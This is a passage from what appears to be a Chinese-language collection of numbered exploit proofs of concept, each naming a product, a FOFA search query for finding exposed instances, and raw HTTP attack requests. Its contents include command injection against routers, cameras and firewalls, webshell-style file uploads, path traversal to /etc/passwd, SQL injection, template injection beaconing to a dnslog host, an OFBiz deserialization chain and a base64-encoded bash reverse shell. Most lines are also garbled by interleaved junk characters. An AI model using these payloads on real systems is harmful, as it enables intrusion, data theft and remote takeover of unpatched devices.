Content-Disposition: form-data; name="target"4 b5 P1 @: p# b. N& R( u* [- E
7 B$ J9 |# M1 q7 ], g. P' |/Applications/SkillDevelopAndEHS/" o5 i0 |% s! |: {- a! }
------YsOxWxSvj1KyZow1PTsh98fdu6l-- \4 y0 h" m! ?
) w6 d, u2 _( M- `8 I4 c3 O
+ I }/ O3 |9 d6 D3 n1 y- J
GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.11 [* B/ K5 c7 E% W" T& ]; s; C& [
Host: x.x.x.x9 D: |& @9 K6 F" K" j( D2 N$ A8 N* E9 _
' g$ R% o4 l! ~6 ]) Y3 q- @
6 C, X- K" d, [ D) o( T, j$ C79. BYTEVALUE 百为流控路由器远程命令执行9 D9 C; q- Z! T( z+ j
FOFA:BYTEVALUE 智能流控路由器
6 J. C! k' I# y2 o2 TGET /goform/webRead/open/?path=|id HTTP/1.1
* t- G. }5 K' z; {. B1 Y/ ZHost:IP
7 E& H, s0 L3 e3 QUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0( l* ~. e* m% k
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
. z1 L5 `; ~+ |% D4 W$ lAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
% t) j9 q/ X5 IAccept-Encoding: gzip, deflate" m" e5 q7 D# j4 v! L
Connection: close
1 F. r& Y: r& W" V; o- x0 ~Upgrade-Insecure-Requests: 1
& O7 p6 g% e* U5 @
! z0 ?1 j# g& S1 b" O+ N1 P9 K/ S
; l$ F6 I: x! w- o! D( q* T80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
, o. b# g7 T3 E! @& _FOFA:app="速达软件-公司产品"5 ]: ]# h; a' ^4 X
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
0 ~. K. |0 F8 w$ Q( ~: S+ gHost: x.x.x.x+ m4 @' o6 Q- x3 e
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.156 r) t4 o* c8 }
Content-Length: 271 ?$ I5 O. @7 O f1 h
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
5 `( E- Z; ] H! Q( D DAccept-Encoding: gzip, deflate
' i- y$ F3 c/ @3 K5 nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.29 q- [# `9 a' O" `! s
Connection: close! \6 ?3 s' ^& _0 m& o# r
Content-Type: application/octet-stream
0 q! k0 D6 e: T# SUpgrade-Insecure-Requests: 1. Q( n3 i. P/ A6 O9 j+ S
. i3 Z4 j g1 c" [; `<% out.print("oessqeonylzaf");%>
$ {& M) e% o1 i" Q3 `4 g, y, W, G' \9 b. I. K( w) x
' ]% F) l& X, T9 c. z! h3 |' iGET /xykqmfxpoas.jsp HTTP/1.1
: |( ]4 R$ [+ D, O v8 kHost: x.x.x.x
" C* j$ e& \) |& U+ nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
( T9 T& F) W V, QConnection: close
" o8 ~2 j* m' C9 [2 OAccept-Encoding: gzip/ z! B& _- ]1 q' b1 ~
- S( x( ?3 p d$ Y/ b/ g) n/ ^6 V! r- b2 |+ J* r1 @
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露0 K# G" F S' ?7 j, a4 x, F
FOFA:app="uniview-视频监控"' U7 G5 {$ J( j3 ?
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1+ ]; k% M% [3 K* r" z' F3 q
Host: x.x.x.x
& q' K, ~' ^ c9 w- z- VUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15- w. u5 b* C- U$ b( ]2 ^$ p
Connection: close6 G3 L8 ^3 J a8 H& q6 L
Accept-Encoding: gzip
8 t& K S3 ?; k+ L @$ n: f, l6 R" b; x/ Z! ~: Q
9 w2 ~! Z h+ o w& [) ^- M82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
; n& K8 B1 u) K* s0 DFOFA:app="思福迪-LOGBASE"- c9 s# n- T. |& F( v
POST /bhost/test_qrcode_b HTTP/1.1
9 f5 p( H- b8 s+ jHost: BaseURL
% z/ J. I x* q3 _. j5 o8 J- TUser-Agent: Go-http-client/1.1. j" v6 n7 |6 S h/ V
Content-Length: 23! r! T$ ?5 d* n4 l2 b' {1 M
Accept-Encoding: gzip
2 n, o& N2 Y) c) I' xConnection: close+ ^0 @6 y; S+ x" X; f" n i( S
Content-Type: application/x-www-form-urlencoded( e! }: W+ P% [
Referer: BaseURL
h$ m" N- b2 ^+ |, E& ~( j4 C
. F1 M) M7 u1 D& X- |! L& M! D4 cz1=1&z2="|id;"&z3=bhost/ S* H: E0 [1 o! d7 q: i
9 @( Z3 {5 Z! P
5 G4 O- V+ j( j3 e2 S83. JeecgBoot testConnection 远程命令执行
2 t* y# j' \* Z2 s- K. i2 r# _FOFA:title=="JeecgBoot 企业级低代码平台"2 u" K9 `) R6 y& t
' |, C# \/ j7 ?; ^: L4 t
) a+ z( V0 G) a- k- |$ R0 TPOST /jmreport/testConnection HTTP/1.1; N1 g) k u$ w' Z& e
Host: x.x.x.x& W% u' a6 h7 J- B
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
; Y( x0 |8 w2 g, M1 j0 \Connection: close! n4 k9 Q6 w, b8 E+ A) s! a* g. _
Content-Length: 8881: O" } q" U5 b7 a) i
Accept-Encoding: gzip
. s; O- F/ T1 `- z4 Y+ S2 gCmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"# O. c) A% p# \/ z- k
Content-Type: application/json
5 i( ]3 K( J0 U
* |' `) Q' @: w' ]$ TPAYLOAD
) j3 o5 }+ t* w* ^! C p7 T% ?0 ]6 @+ k, k$ @" G5 K4 X; q p
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入0 G. H7 L7 f; U$ W9 \
FOFA:title=="JeecgBoot 企业级低代码平台": Z& [! s* }5 l( J$ ^7 A+ v# ~& g' b
' t' ? m2 s, ]; Q1 v
, F$ d8 B! y4 J P/ n8 M) {
k7 z6 V8 r' ?% H) a
POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1 f7 h/ Z) o# Y, J* y* e
Host: 192.168.40.130:80802 Z! c2 ]+ D! |( `* p+ G; V) J
User-Agent: curl/7.88.17 }. j' V) i3 g' d
Content-Length: 156' j0 Y0 m# e- ^* U
Accept: */*' P( d7 ~+ M) x. b$ M
Connection: close: h/ p: M& e6 }8 @6 N/ i K
Content-Type: application/json
6 v! O) R( C$ }* ]) p6 a3 L. CAccept-Encoding: gzip
6 X# M" L. q7 U+ C8 i" V! k
) O4 T5 ]$ {2 u{2 M6 P8 O& i/ n# R4 f0 ^
"sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
8 |/ H: o% l1 E, J" |) Q( L9 m "type": "0"
" d( d6 j( A/ _) K+ x% ?5 T8 ]7 x}
. h3 C6 Q2 g! Y4 [ S) k
- R: a( N9 Y2 j( r, s/ l6 I, d! p$ J( b" a7 |' b7 x
85. SysAid On-premise< 23.3.36远程代码执行% A8 e- b, ~+ Q: H4 T" H& @
CVE-2023-47246 a6 A$ \# ]6 V' x
FOFA:body="sysaid-logo-dark-green.png"
% J8 B! K. Z' J4 Q. zEXP数据包如下,注入哥斯拉马
( | b- S+ K7 B$ i3 W3 JPOST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.19 w. ?( q6 Z8 v* c, Y8 l& a6 f; i
Host: x.x.x.x
; D! u f2 d u7 vUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
7 K) a" P1 {8 L. l8 s- q% i! C ~Content-Type: application/octet-stream: h5 ^# d% i/ t" s1 _& h
Accept-Encoding: gzip" U: |5 i6 V/ Y& R
' I" Y. U/ l! l+ L5 R/ T' M
PAYLOAD2 k" D+ @( P# A2 z6 a0 B9 s
3 L' d; o# L! e, n4 ^1 j回显URL:http://x.x.x.x/userfiles/index.jsp; W$ S+ w) J4 B) L5 y% s
* S* c4 N. A; u; u0 j, T86. 日本tosei自助洗衣机RCE" G" e- q% I. B2 e) L, Y
FOFA:body="tosei_login_check.php"
5 z+ |9 z" }8 c( n, Q" XPOST /cgi-bin/network_test.php HTTP/1.17 w h+ Z9 y/ K7 }5 Z, x- n
Host: x.x.x.x
( X: j3 a8 |9 `, Y( {# S0 LUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
5 G2 O3 O9 a' _9 O& N# g& i7 bConnection: close
" l3 l* O- y3 n6 I( ?Content-Length: 441 X' O. M- C" Q; T( j
Accept: */*2 Y3 x) Y- P# M' C2 Q& C; l
Accept-Encoding: gzip! d: p$ J& d( Q+ E U* E9 l y
Accept-Language: en
" M' {8 p$ R2 ]Content-Type: application/x-www-form-urlencoded
, g& q+ K- P7 O. n. J f: X* c7 w, U+ v2 O
host=%0acat${IFS}/etc/passwd%0a&command=ping1 K' E4 a3 \8 c# `
, c% {% L6 ^( s
. J F) a* A6 y
87. 安恒明御安全网关aaa_local_web_preview文件上传
7 c1 ], d7 X1 Z1 A. SFOFA:title="明御安全网关"- ^2 A0 o) m$ P0 i b
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1* Q l. f. ^* P7 b. Q! {. A
Host: X.X.X.X) r! P. d: d% @/ R0 M$ W" B6 s
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
6 F1 _1 I0 g& b* v1 C$ i5 ~Connection: close ~" M+ c9 `/ a
Content-Length: 198
7 Z. g* A! F6 t" vAccept-Encoding: gzip
6 G5 `; j* i, X" B2 d5 z& tContent-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd* V0 |7 {; D; d+ e8 K% x; o
" R) x; ~0 w" i; ~" M& n--qqobiandqgawlxodfiisporjwravxtvd
( b _ t& d* d4 rContent-Disposition: form-data; name="123"; filename="9B9Ccd.php" ^ M; x% _4 Z6 y
Content-Type: text/plain6 o! C) R; v* B# g0 T* A* L
5 J! t: `1 a3 o }; U- ^
2ZqGNnsjzzU2GBBPyd8AIA7QlDq, z6 {5 Q; V9 Q' O$ e
--qqobiandqgawlxodfiisporjwravxtvd--
/ i2 K2 M5 ^8 V1 m1 ^2 u. {" u) u; [" I
, @% @" ? W5 L; E/jfhatuwe.php9 A+ @+ h$ T$ S+ j4 Q- m# P
) Z! r" q$ n# n# h2 V
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行1 y% G) c) j2 c+ _6 a. j8 m, Z
FOFA:title="明御安全网关"
9 p4 B* G. k8 m5 YGET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
: k. o! p6 R3 _Host: x.x.x.xx.x.x.x$ s; f: F) |% R( m( Q
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
1 E: p: @* w A' f+ [' k& p8 {Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.88 K$ A* h0 A0 k6 E
Accept-Encoding: gzip, deflate
* P# u* c# {/ V# B6 x8 R7 _Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2; U/ T0 c7 I1 g! p
Connection: close9 ?0 a w) Z& E( ^4 w* ^- J
$ Q5 P& w0 g+ d6 J% G" E3 b
+ M7 b5 a5 C4 T8 y, Q5 p+ w* N9 l+ Z3 [/astdfkhl.php
# y p0 M$ Y+ u! H' H6 w" E, Z e7 I7 K7 E! ]1 v( e% K. ?% T( S
89. 致远互联FE协作办公平台editflow_manager存在sql注入+ Q0 V& p$ M: Q3 ?4 E0 |- A6 _ z- d
FOFA:title="FE协作办公平台" || body="li_plugins_download"
/ v$ d, U" b6 J1 b: f' A4 \POST /sysform/003/editflow_manager.js%70 HTTP/1.1
, M9 @" ]1 W( w+ C& fHost: x.x.x.x# @1 Z5 w/ Y8 l% B: I
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15( ~" y6 f" B% s0 }, ^
Connection: close
: x+ \# s, c5 J+ W, y w& @Content-Length: 416 y5 Z( n, ?2 s& b. o+ J" {
Content-Type: application/x-www-form-urlencoded$ N) T/ i' k$ T$ D9 Z# A
Accept-Encoding: gzip' P! w n+ Q2 r
* Z9 G3 S' U8 w6 x
option=2&GUID=-1'+union+select+111*222--+
1 ~7 C8 Y7 N9 @ ]$ q, V( w; W+ Q2 J/ d3 a) s. _
' J; b; I6 K: q$ i% X$ t# A' L
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
! N$ G. H% l) E0 M# `* AFOFA:icon_hash="-1830859634"
! v* ^/ d" o7 pPOST /php/ping.php HTTP/1.1$ a, k+ r# y: l/ O/ w6 x+ e
Host: x.x.x.x
8 L; s% e- m' W+ J, |& wUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
" I% S( b5 Z6 w4 c/ \5 JContent-Length: 51
+ n+ l( ]3 x0 c, wAccept: application/json, text/javascript, */*; q=0.01. k" N% H6 w' H& x$ i/ s- z4 U
Accept-Encoding: gzip, deflate t' {4 B0 I; [/ F$ w
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2$ u) u6 I R, @% d" u# e
Connection: close) S! p. d/ ]3 y
Content-Type: application/x-www-form-urlencoded: [! ]% Q: t ? I7 e j
X-Requested-With: XMLHttpRequest. u8 w3 p, C z' j
; Y; ^7 a6 }) F4 [ {jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig
3 i" K6 F, C# O( y3 d* P9 N2 C/ ?7 {! H9 w+ U" O2 Y, t Z9 X
9 _1 A8 P" s# r9 I. S
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
5 D' |; h: T+ B2 b" `8 Y: eFOFA:title="综合安防管理平台". h2 C' M2 M1 _; ^! Y
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
+ s \- Z$ b, V! Q y KHost: your-ip$ \" c* p( W5 Z1 X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
T2 V( j J+ B# u# `/ r6 H: T0 R* dAccept-Encoding: gzip, deflate& d* O7 ^/ }7 D2 _& r
Accept: */*
* W3 |5 H1 z6 D% @6 ?# h1 }" @Connection: keep-alive
2 V4 ?8 a6 V4 L' K9 H8 ?/ E
]8 _2 V5 V. J) T
* G2 ^/ J. y- D7 r" H- n2 H4 j2 g4 k
92. 海康威视运行管理中心session命令执行
# y: \- Y& C+ Q" }2 W! r3 N' X3 E4 Y! |Fastjson命令执行
/ x. J% q9 }: i1 ahunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
9 m* r3 r, P" V& t6 [POST /center/api/session HTTP/1.1
* ^, |/ d5 O1 bHost: X- r3 \/ D3 L, j. u( w3 Q
Accept: application/json, text/plain, */*. G j) t( ~: {; p
Accept-Encoding: gzip, deflate) _& h# ~9 y" ~0 c" i
X-Requested-With: XMLHttpRequest
! T! I) j* M6 c0 J) ZContent-Type: application/json;charset=UTF-8
2 w1 h5 V* p" x7 k4 c, }X-Language-Type: zh_CN+ s2 M- b0 d$ u1 d) z
Testcmd: echo test4 d; e1 x2 @* ~) k$ Q4 i d
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.368 |8 t! x' D0 J
Accept-Language: zh-CN,zh;q=0.9
* m# }. O) R( ?& j1 s3 @Content-Length: 5778
) K; t* }5 F$ S: c" J& W8 u7 t2 P( H7 g7 `
PAYLOAD
! c2 u2 {3 h) j3 `8 [3 v, H$ l; G6 E( ^* [# a. s
; i* \- L8 W) c( E93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传$ j0 X& _% `2 j+ z: ^
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
' \. x0 Y' y9 HPOST /?g=app_av_import_save HTTP/1.1; G6 x$ w) {9 s; H" q, P: a. E2 ]
Host: x.x.x.x1 l E! {1 o/ k, o* `
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx# ]+ |( V' y' j* s
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36% w. \; A: p$ V0 D
7 w! T3 v! {" a+ {9 Z7 A0 D8 Q7 A------WebKitFormBoundarykcbkgdfx
7 }4 r+ h8 S+ r% OContent-Disposition: form-data; name="MAX_FILE_SIZE"
: |, w O. O0 s0 @8 p, g B3 y6 F4 Q f2 c) i
10000000 k5 q% Z& a* h* J( \, I0 d
------WebKitFormBoundarykcbkgdfx
% }0 B% Z4 Y% g: tContent-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
- ]& C+ j# `# s4 eContent-Type: text/plain
+ h$ K! V& @1 L: x! r' h' w L9 [6 @, O w
wagletqrkwrddkthtulxsqrphulnknxa" h# @* n5 Y8 }% J. p
------WebKitFormBoundarykcbkgdfx9 P. X* {6 g- ?! {( k
Content-Disposition: form-data; name="submit_post"
& \0 ?' S, _9 o' Y; w9 @
, s0 y4 k9 i4 e* e5 aobj_app_upfile
- P7 u/ C* D1 e# i, d2 U------WebKitFormBoundarykcbkgdfx
+ ^4 C" N* j+ ]7 rContent-Disposition: form-data; name="__hash__"4 i# ?! d$ I& y: W. |5 `8 B0 v+ E+ i+ u
# S' f+ {5 ~- _7 Z0b9d6b1ab7479ab69d9f71b05e0e9445! P- w6 A; Z- t. w
------WebKitFormBoundarykcbkgdfx--
2 e& t G$ Z. C2 e2 f% G* |) f. H5 Q
- `0 K, C; x' F7 {3 T6 O X9 D& [1 i/ s a# g$ k
GET /attachements/xlskxknxa.txt HTTP/1.16 s L3 H( K" z. q: s, H
Host: xx.xx.xx.xx
( {0 e) ^6 b7 g" h: SUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
+ H4 ]+ J& X/ C P9 D
$ O3 y# }3 g7 r+ I `2 y/ T G' G
, ^" `% W/ V+ O+ w94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
5 |0 o9 Q: ~: Z4 \FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
0 i; \! R" B. Q, TPOST /?g=obj_area_import_save HTTP/1.1
3 K+ S D/ X& X/ b6 X% _Host: x.x.x.x2 V# x i+ o! t- P* p- V
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt/ g0 m/ f4 l5 F1 B3 B
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
( B+ Z. q1 m; W; I! D
4 U* o1 r: @; ~, L) r------WebKitFormBoundarybqvzqvmt6 m! w6 t' M$ \% v7 S- h
Content-Disposition: form-data; name="MAX_FILE_SIZE"
( m9 n# G0 L% ]4 c' L% p8 \" l
7 u. k8 {" F; u& V; L$ F/ t+ x1 Z10000000+ y: W O* \+ j
------WebKitFormBoundarybqvzqvmt
; k, G) V: c v7 J% q4 R: S+ eContent-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
. T- b S2 v/ E4 ^Content-Type: text/plain* B* {- I: W& k! e$ d3 m! f
6 C: ?0 {% D+ k+ m4 w V2 I" qpxplitttsrjnyoafavcajwkvhxindhmu
4 W! o K' J# U8 u: b2 ?" V( R------WebKitFormBoundarybqvzqvmt, A- M5 u/ W3 s7 U# b, Y+ W1 q6 l
Content-Disposition: form-data; name="submit_post"
6 n9 x9 d* t" {. [; U+ {( `0 }9 C, m+ s/ F' K7 B' F- ]
obj_app_upfile
& D: q" J3 _3 v$ q* e0 g0 B& W------WebKitFormBoundarybqvzqvmt
$ h, o$ t3 u4 [+ }7 q9 ~0 i7 K) FContent-Disposition: form-data; name="__hash__") e- \; F! V& y, Z4 [; P
4 V7 X" J+ M$ U- c
0b9d6b1ab7479ab69d9f71b05e0e9445! `3 J! b) f2 t# \; h1 ]
------WebKitFormBoundarybqvzqvmt--
2 V: ?! l0 \6 v. ^
, I: h8 b) N( b; R7 ]3 ]: B" R" t7 L5 W+ h1 ~
: L3 g. Z2 O. P: |0 \$ nGET /attachements/xlskxknxa.txt HTTP/1.1
+ Z J: h8 m& r+ ]: `$ z" p# PHost: xx.xx.xx.xx q$ I: O8 W) g; x+ R5 _
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
& \: |. ?7 m8 |4 @/ I8 V) A3 i* u2 f' R/ ~
9 m+ n, @0 b: T; A B' @0 J3 H) u( w, V) r9 O- r7 Y
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
9 w0 k9 d, ?3 yCVE-2023-49070 B+ M7 l$ Q, M# t" m8 D
FOFA:app="Apache_OFBiz"
4 a$ k8 k! D- M% IPOST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
' t) H1 H. r5 xHost: x.x.x.x. n$ [2 x/ C4 F8 d: _6 `* z
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
D) Z7 ?- W& [: OConnection: close
1 @' z; |5 h$ o6 c9 vContent-Length: 889
) b, J% q7 a. \: o) mContent-Type: application/xml, V- u! Y" D* T4 {8 @
Accept-Encoding: gzip
3 i$ T5 _8 O' Y/ X4 n
$ z& G) x: g2 B4 e3 z<?xml version="1.0"?>
, q4 X+ S8 x) ?% F7 o3 _<methodCall>4 U* [0 u' R7 f5 F
<methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
6 L- E. z, K+ w: k1 O2 ]; a <params>1 ]8 D& E. m# k/ @) S( m
<param>, H v1 A5 t; l5 Y2 E$ n1 U- S$ O- `
<value>
/ g. w' `& M( y+ L0 l( `& f <struct>( R+ r9 H# }) j9 x2 y
<member>
" N3 o. y& a+ H N- R! f* j <name>test</name>! T1 U$ p% h9 v( W0 `3 y
<value>
8 a0 `) A* ~8 ]# K <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>
. l* x% @5 p* S" E: r& k </value>* t8 ~5 L8 L* B/ a; I H6 M
</member>
: K) D) i! k* ]. ~: }% K: r+ P7 a </struct>
1 J* _' R& {7 q </value>
' D' ?. m& l2 I) L, C </param>
8 C9 P) `/ L. `* N9 w$ \* K9 s </params>
7 ^3 N \5 [% f/ w9 o7 ]</methodCall>3 Q& X# @* J4 H0 y) d& A" u
9 t$ V) F* c- T+ e2 \/ \
1 }' G1 [; r. u3 y% o用ysoserial生成payload5 }' r# e1 }- B' O: a
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"6 u% G% m X* i/ ?- A
" \* e" ?2 N, s4 v7 |3 I
0 w! u' q) N( d将生成的payload替换到上面的POC
: H; s/ ?4 e9 vPOST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.18 }2 s: _3 |) J6 e+ ?
Host: 192.168.40.130:8443
5 c% q) ]8 G8 p& ]: J; TUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
]: O, Y/ X3 J0 H' [5 v2 HConnection: close
I3 w: X$ S7 @6 M" \Content-Length: 889
$ A- C& x5 A: \3 [( VContent-Type: application/xml
% X, G% ~$ {7 o; N! |+ |$ P, }Accept-Encoding: gzip
: ?+ f( G2 b5 i/ H+ i) m
2 _& n" _/ Q; U" ePAYLOAD* q+ k, C' c, e
, O4 q) A' ]( G: m# E+ D& v
96. Apache OFBiz 18.12.11 groovy 远程代码执行
2 M8 B+ T9 y1 c7 L, t9 W8 c0 Z% \; x" T8 gFOFA:app="Apache_OFBiz"
* \ J. t3 Q" j' @POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1( M; g# s+ K2 s4 A) n% n: C' m/ C
Host: localhost:8443
~! R" H$ j4 Z& a8 XUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0' |3 l* ~$ s% O$ I6 c) L
Accept: */*
' ^) \/ F5 u( zAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.20 J3 h, K2 i8 u
Content-Type: application/x-www-form-urlencoded
( s/ o' g% r: r, N, f& T/ TContent-Length: 552 }' R& [. R2 S* U2 }" C# V, w
* S o0 @% t, U% ^
groovyProgram=throw+new+Exception('id'.execute().text);+ I6 `: i' a8 P" d0 L# a
* i! Z% }& P0 K, ?' J' q0 J( b' U: F
反弹shell
) F' I# S- t! v! V! [在kali上启动一个监听% v, i/ z8 R& c* {1 l3 p# k
nc -lvp 7777
! d; o; m& y* d# A# h% y# i
- i* m& X7 D( y2 f5 {6 e2 `. m5 y( tPOST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1$ x/ ~1 _7 O0 r4 E2 @ l) l
Host: 192.168.40.130:8443
+ |/ S( c2 Q9 v7 y: d7 dUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
, v& a. n* V3 z+ }9 k* s# gAccept: */*
4 Y! t1 P: T ~% \Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2; E3 s% y8 f9 J$ b9 u
Content-Type: application/x-www-form-urlencoded( q3 [$ y0 P* k% x* I8 ?
Content-Length: 71
9 E0 j! n0 ?9 M; c2 `9 r
5 d/ }" [2 V1 w- w# r, XgroovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute(); \0 N# U4 R# g
0 I/ n8 T5 U5 u( H* p97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行7 ]" e I2 P* j+ M1 |
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"; Q; N# n( V! H6 l8 Z
GET /passport/login/ HTTP/1.1* ~- b4 u# G+ ^
Host: 192.168.40.130:8085
, n' o3 {4 {4 c0 n- Z9 W3 LUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
" J* o( _1 |1 P- Z H! P. S2 m% sAccept-Encoding: gzip" M+ Q. P. M' `2 T- B
Connection: close9 Y; l/ `; {8 A; B- p# L
Cookie: rememberMe=PAYLOAD
* K; a: I7 n* ]! e( p5 C) aX-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"
' V1 H$ i" D! u9 r0 a
1 y; N6 Y1 p% ~5 }" a+ o1 o5 W) ~7 W: ]& h l
98. SpiderFlow爬虫平台远程命令执行
) X3 `! ?- Q( ~6 `& n5 HCVE-2024-0195" l1 y' \9 f, A: k
FOFA:app="SpiderFlow"5 S$ e6 y. o- I1 [% N1 [+ x
POST /function/save HTTP/1.1" T L/ E$ e' N0 T8 C& H
Host: 192.168.40.130:8088
0 U& K; f/ q0 a, N+ U# wUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
+ R; I5 [% v' U7 xConnection: close3 ?9 w' Y1 q( _1 s5 d
Content-Length: 1214 F# K. P. m+ k3 o( O3 J
Accept: */*0 l6 E4 ^/ ]! g0 F
Accept-Encoding: gzip, deflate( s% E& G/ U) n# ^, e
